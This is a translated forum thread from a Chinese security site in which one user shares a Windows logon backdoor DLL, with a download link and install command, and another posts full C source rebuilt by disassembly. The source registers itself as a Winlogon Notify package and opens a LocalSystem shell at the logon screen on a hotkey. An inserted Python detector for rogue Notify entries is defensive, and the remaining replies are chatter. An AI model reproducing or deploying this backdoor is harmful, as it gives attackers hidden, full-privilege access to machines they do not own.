Author: tabris17 [tabris17] Forum user
Install it on the target system and you can log on locally without a password.
Download: http://www.20cn.net/~tabris17/download/backdoor.dll
Installation: run rundll32.exe [Dll Filename] Install, e.g. rundll32.exe c:\backdoor.dll Install
Installation requires write access to HKEY_LOCAL_MACHINE in the registry.
Once installed, whenever the logon screen appears, press "Ctrl+G" and you are in the system, with LocalSystem privileges too.
Original post, posted 04-01-13 18:46
Reply: NetDemon [netdemon] ADMIN
Floor 1, posted 04-01-14 17:56
Reply: yaochi [yaochi] Forum user
Forever supporting God; you Sibuxiang thing, haha
Floor 2, posted 04-01-14 20:30
Reply: 286 [unique] Moderator
That powerful? And if you don't press CTRL+G but type a username and password instead, it still works normally, right? Impressive, impressive.
Floor 3, posted 04-01-15 09:25
Reply: naotian [naotian] Forum user
This is really a nice thing, HOHO
Floor 4, posted 04-01-16 10:53
Reply: tabris17 [tabris17] Forum user
Without pressing CTRL+G, typing a username and password also logs on normally. To uninstall, delete the registry branch HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cindsrv and delete the file %systemroot%\cindsrv.dll, and that's it.
Floor 5, posted 04-01-16 15:49
Reply: sinister [sinister] Forum user
I came across this little program by chance and spent some time disassembling it. I think the idea behind it is quite clever. In fact, in this line of work, how deeply you have studied the low-level internals does not always matter that much; good ideas count for more. This little program illustrates that well. The C code below was written from the disassembly of backdoor.dll. I made some adjustments to it according to my own coding habits.

//---------------------------------------------------------------------------
#include <windows.h>
#include <Winwlx.h>

#define PROGNAME  "\\cindsrv.dll"
#define WINSHELL  "\\explorer.exe"
#define HOTKEY_ID 925

HINSTANCE hInst = NULL;
// Winlogon notification-package key: every DllName registered under
// Notify is loaded into winlogon.exe itself, which runs as LocalSystem.
TCHAR szMiniKey[] = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\cindsrv";

__declspec(dllexport) VOID APIENTRY EventStartup(PWLX_NOTIFICATION_INFO pInfo);
__declspec(dllexport) BOOL WINAPI Install(void);
int APIENTRY CreateLogoOnWindow(HINSTANCE hInstance, int nCmdShow);
BOOL InitApplication(HANDLE hInstance);
BOOL InitInstance(HANDLE hInstance, INT nCmdShow);
LRESULT CALLBACK MainWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);
VOID WINAPI LoadShell(void);
BOOL WINAPI RegNotiPackage(void);
DWORD WINAPI StartLogoThread(LPVOID lParam);

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fwdreason, LPVOID lpvReserved)
{
    switch (fwdreason) {
    case DLL_PROCESS_ATTACH:
        hInst = hinstDLL;
        DisableThreadLibraryCalls(hinstDLL);
        break;
    }
    return TRUE;
}
//---------------------------------------------------------------------------
// Hidden window that exists only to own the hot key and pump its messages.
int APIENTRY CreateLogoOnWindow(HINSTANCE hInstance, int nCmdShow)
{
    MSG msg;
    if (!InitApplication(hInstance))
        return FALSE;
    if (!InitInstance(hInstance, nCmdShow))
        return FALSE;
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    return (int)msg.wParam;
}

BOOL InitApplication(HANDLE hInstance)
{
    WNDCLASS wc;
    wc.style         = 0;
    wc.lpfnWndProc   = MainWndProc;
    wc.cbClsExtra    = 0;
    wc.cbWndExtra    = 0;
    wc.hInstance     = hInstance;
    wc.hIcon         = LoadIcon(NULL, IDI_APPLICATION);
    wc.hCursor       = LoadCursor(NULL, IDC_ARROW);  // stock cursor, not a module resource
    wc.hbrBackground = (HBRUSH)GetStockObject(WHITE_BRUSH);
    wc.lpszMenuName  = "LogoOn";
    wc.lpszClassName = "WinLogoOnWClass";
    return RegisterClass(&wc);
}

BOOL InitInstance(HANDLE hInstance, INT nCmdShow)
{
    HWND hWnd;
    hInst = hInstance;
    hWnd = CreateWindow("WinLogoOnWClass", "WinLogoOn Application",
                        WS_OVERLAPPEDWINDOW,
                        CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT, CW_USEDEFAULT,
                        NULL, NULL, hInstance, NULL);
    if (!hWnd)
        return FALSE;
    // This build registers Ctrl+Alt+Enter; the first post mentions Ctrl+G.
    RegisterHotKey(hWnd, HOTKEY_ID, MOD_CONTROL | MOD_ALT, VK_RETURN);
    ShowWindow(hWnd, nCmdShow);
    UpdateWindow(hWnd);
    return TRUE;
}

LRESULT CALLBACK MainWndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message) {
    case WM_PAINT:
        break;
    case WM_HOTKEY:
        if (wParam == HOTKEY_ID)
            LoadShell();
        break;
    case WM_DESTROY:
        UnregisterHotKey(hWnd, HOTKEY_ID);
        PostQuitMessage(0);
        break;
    default:
        return DefWindowProc(hWnd, message, wParam, lParam);
    }
    Sleep(50);
    return 0;
}

// Starts explorer.exe from inside winlogon.exe on the interactive desktop,
// so the shell inherits Winlogon's LocalSystem token, then switches to it.
VOID WINAPI LoadShell(void)
{
    PROCESS_INFORMATION pi = {0};
    STARTUPINFO si = {0};
    TCHAR szWinPath[MAX_PATH] = {0};
    HDESK hDesk;

    GetWindowsDirectory(szWinPath, MAX_PATH);
    lstrcat(szWinPath, WINSHELL);
    si.cb = sizeof(STARTUPINFO);
    si.lpReserved = NULL;
    si.lpTitle = NULL;
    si.lpDesktop = "WinSta0\\Default";
    si.dwX = si.dwY = si.dwXSize = si.dwYSize = 0L;
    si.dwFlags = 0;
    si.wShowWindow = SW_SHOW;
    si.lpReserved2 = NULL;
    si.cbReserved2 = 0;
    CreateProcess(NULL, szWinPath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE,
                  NULL, NULL, &si, &pi);
    hDesk = OpenDesktop("Default", 0, TRUE, MAXIMUM_ALLOWED);
    SwitchDesktop(hDesk);
}

// Writes the Notify registration that makes Winlogon load cindsrv.dll and
// call EventStartup when Winlogon starts.
BOOL WINAPI RegNotiPackage(void)
{
    HKEY hMiniKey;
    DWORD Disposition;
    LONG err;
    DWORD dwAsyn = 1;
    DWORD dwImpe = 1;
    TCHAR szDllName[] = "cindsrv.dll";
    TCHAR szStartName[] = "EventStartup";

    err = RegCreateKeyEx(HKEY_LOCAL_MACHINE, szMiniKey, 0, "",
                         REG_OPTION_NON_VOLATILE, KEY_WRITE | KEY_READ,
                         NULL, &hMiniKey, &Disposition);
    if (err)
        return FALSE;
    err = RegSetValueEx(hMiniKey, "Asynchronous", 0, REG_DWORD, (LPBYTE)&dwAsyn, sizeof(dwAsyn));
    err = RegSetValueEx(hMiniKey, "DllName", 0, REG_SZ, (LPBYTE)szDllName, sizeof(szDllName));
    err = RegSetValueEx(hMiniKey, "Impersonate", 0, REG_DWORD, (LPBYTE)&dwImpe, sizeof(dwImpe));
    err = RegSetValueEx(hMiniKey, "Startup", 0, REG_SZ, (LPBYTE)szStartName, sizeof(szStartName));
    RegCloseKey(hMiniKey);
    return err == 0;
}

// Exported entry used by "rundll32.exe backdoor.dll Install": copies this
// DLL into the system directory as cindsrv.dll and registers it.
BOOL WINAPI Install(void)
{
    TCHAR szFilePath[MAX_PATH] = {0};
    TCHAR szSysPath[MAX_PATH] = {0};

    GetSystemDirectory(szSysPath, MAX_PATH);
    lstrcat(szSysPath, PROGNAME);
    GetModuleFileName((HMODULE)hInst, szFilePath, MAX_PATH);
    CopyFile(szFilePath, szSysPath, FALSE);
    return RegNotiPackage();
}

DWORD WINAPI StartLogoThread(LPVOID lParam)
{
    CreateLogoOnWindow(hInst, SW_HIDE);
    return TRUE;
}

// Winlogon calls this on its Startup event; the hot-key window runs on its
// own thread so Winlogon's event dispatch is not blocked.
VOID APIENTRY EventStartup(PWLX_NOTIFICATION_INFO pInfo)
{
    HANDLE hThread;
    DWORD dwTid;
    hThread = CreateThread(NULL, 0, StartLogoThread, NULL, 0, &dwTid);
    CloseHandle(hThread);
}
//---------------------------------------------------------------------------
Floor 6, posted 04-01-18 04:25
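From the defender's side, the persistence this thread describes (the Notify\cindsrv key from the uninstall post and the values RegNotiPackage() writes) can be hunted by exporting the Winlogon Notify key and flagging any package whose DllName is not a stock one. The example below is added here and is not code from the thread or from tabris17 or sinister: it parses a constructed `reg export` sample, and its allowlist of Windows XP notify DLLs is an assumption to be verified against a known-clean host.

```python
import re
NOTIFY_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
# Assumed baseline of stock Windows XP Notify DLLs; verify it against a known-clean host.
KNOWN_DLLS = {"crypt32.dll", "cryptnet.dll", "cscdll.dll", "wlnotify.dll", "sclgntfy.dll"}
# Constructed `reg export` sample; the second subkey mirrors the values Install() in the thread writes.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\crypt32chain]
"Asynchronous"=dword:00000000
"DllName"=hex(2):63,00,72,00,79,00,70,00,74,00,33,00,32,00,2e,00,64,00,6c,00,\
  6c,00,00,00
"Logoff"="ChainWlxLogoffEvent"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\cindsrv]
"Asynchronous"=dword:00000001
"DllName"="cindsrv.dll"
"Startup"="EventStartup"
'''

def decode_value(raw):
    """Decode the REG_SZ, REG_DWORD and REG_EXPAND_SZ (hex(2)) forms found in .reg files."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace("\\\\", "\\")
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith("hex(2):"):  # UTF-16LE bytes, NUL-terminated
        return bytes.fromhex(raw[7:].replace(",", "")).decode("utf-16-le").rstrip("\0")
    return raw

def parse_reg(text):
    """Return {subkey: {value_name: value}} for every subkey under NOTIFY_KEY."""
    text = re.sub(r",\\\r?\n\s*", ",", text)  # join backslash-continued hex lines
    prefix, keys, current = NOTIFY_KEY.lower() + "\\", {}, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            path = line[1:-1]
            current = keys.setdefault(path[len(prefix):], {}) if path.lower().startswith(prefix) else None
        elif current is not None and line.startswith('"'):
            name, _, raw = line[1:].partition('"=')
            current[name] = decode_value(raw)
    return keys

def find_suspicious(keys):
    """Flag subkeys whose DllName is outside the baseline, with the Winlogon events they hook."""
    findings = []
    for subkey, values in keys.items():
        dll = str(values.get("DllName", "")).lower().rsplit("\\", 1)[-1]
        if dll not in KNOWN_DLLS:
            events = sorted(k for k, v in values.items() if isinstance(v, str) and k != "DllName")
            findings.append((subkey, dll, events))
    return findings
```

On a real host, feed it the output of `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" notify.reg`; every hit is a DLL that Winlogon loads as LocalSystem and should be examined and removed as the uninstall post describes.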
Reply: NetDemon [netdemon] ADMIN
That guy Virus popped up out of nowhere again and gave me a start.
Floor 7, posted 04-01-19 17:53
Reply: tabris17 [tabris17] Forum user
Having the famous sinister disassemble my program is truly a great honor for me.
Floor 8, posted 04-01-19 22:07
Reply: ricky [ricky] Moderator
Nice
Floor 9, posted 04-01-20 16:49
Reply: sinister [sinister] Forum user
Sibuxiang [tabris17], you are too kind. I discussed dynamically modifying the process name with you on xfocus; that METALLICA was me.
Floor 10, posted 04-01-22 21:10
Reply: feifan [feifan] Forum user
A newbie asking the expert Sibuxiang: this is a backdoor used locally, not one for remote control of the other machine over the network, right?
Floor 11, posted 04-02-12 21:32
Reply: tuzi [tuzi] Moderator
Not bad, not bad; learning from Sibuxiang, heh heh
Floor 12, posted 04-02-13 10:31
Reply: newmyth21 [newmyth21] Forum user
Supporting Sibuxiang
Floor 13, posted 04-02-13 12:10
Reply: raymondw [raymondw] Forum user
So many good things mentioned: first the program, and then METALLICA. Do you listen to them too?
Floor 14, posted 04-02-13 23:30
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by: NetDemon
粤ICP备05087286号